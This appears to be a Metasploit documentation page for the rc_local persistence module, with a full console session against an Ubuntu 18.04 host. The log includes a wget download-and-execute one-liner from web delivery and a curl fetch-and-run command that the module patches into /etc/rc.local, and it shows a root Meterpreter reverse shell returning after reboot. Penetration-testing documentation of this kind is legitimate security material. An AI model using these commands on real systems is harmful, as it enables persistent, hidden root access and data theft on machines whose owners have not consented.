ContextQMD
Back to Metasploit Framework

Rc Local

documentation/modules/exploit/linux/persistence/rc_local.md

6.4.1314.8 KB
Original Source

Vulnerable Application

This module will edit /etc/rc.local in order to persist a payload. The payload will be executed on the next reboot.

Verified on Ubuntu 18.04.3

Verification

  1. Exploit a box and get a root session
  2. use exploit/linux/persistence/rc_local
  3. set SESSION <session>
  4. set PAYLOAD <payload>
  5. set LHOST <lhost>
  6. exploit

Options

PAYLOAD_NAME

Name of the payload file if a cmd payload is not used. Defaults to a random name

Scenarios

Ubuntu 18.04.3

Initial access vector via web delivery

[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set srvport 8181
srvport => 8181
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4545
lport => 4545
resource (/root/.msf4/msfconsole.rc)> set URIPATH l
URIPATH => l
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 111.111.1.111:4545 
[*] Using URL: http://111.111.1.111:8181/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO zLeqpMSF --no-check-certificate http://111.111.1.111:8181/l; chmod +x zLeqpMSF; ./zLeqpMSF& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > 
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.222
[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.222:48462) at 2025-02-09 06:54:32 -0500
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/home/ubuntu) > getuid
Server username: root
(Meterpreter 1)(/home/ubuntu) > sysinfo
Computer     : ubuntu18desktop.local
OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
(Meterpreter 1)(/home/ubuntu) > background
[*] Backgrounding session 1...

Persistence

[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/rc_local 
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:1 Agents:1) exploit(linux/persistence/rc_local) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(linux/persistence/rc_local) > set WritableDir /home/ubuntu/
WritableDir => /home/ubuntu/
[msf](Jobs:1 Agents:1) exploit(linux/persistence/rc_local) > exploit
[*] Command to run on remote host: curl -so ./GvwBrOrMxFD http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./GvwBrOrMxFD;./GvwBrOrMxFD&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(linux/persistence/rc_local) > 
[*] Fetch handler listening on 111.111.1.111:8080
[*] HTTP server started
[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
[*] Started reverse TCP handler on 111.111.1.111:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /etc/rc.local is writable
[*] Reading /etc/rc.local
[*] Created /etc/rc.local backup: /root/.msf4/loot/20250209065535_default_222.222.2.222_rc.local_367870.txt
[*] Patching /etc/rc.local
[+] Payload will be triggered at next reboot
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/ubuntu18desktop.local_20250209.5536/ubuntu18desktop.local_20250209.5536.rc

Reboot host

[msf](Jobs:2 Agents:1) exploit(linux/persistence/rc_local) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/home/ubuntu) > shell
Process 2052 created.
Channel 4 created.
reboot
[*] 222.222.2.222 - Meterpreter session 1 closed.  Reason: Died
Terminate channel 4? [y/N]  y
[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>
[msf](Jobs:2 Agents:0) exploit(linux/persistence/rc_local) > 
[*] Client 222.222.2.222 requested /Hg3DGEu9GqlWD06kh4AzFg
[*] Sending payload to 222.222.2.222 (curl/7.58.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.222
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:36260) at 2025-02-09 06:56:39 -0500
[msf](Jobs:2 Agents:1) exploit(linux/persistence/rc_local) > sessions -i 2
[*] Starting interaction with 2...
(Meterpreter 2)(/) > getuid
Server username: root
(Meterpreter 2)(/) >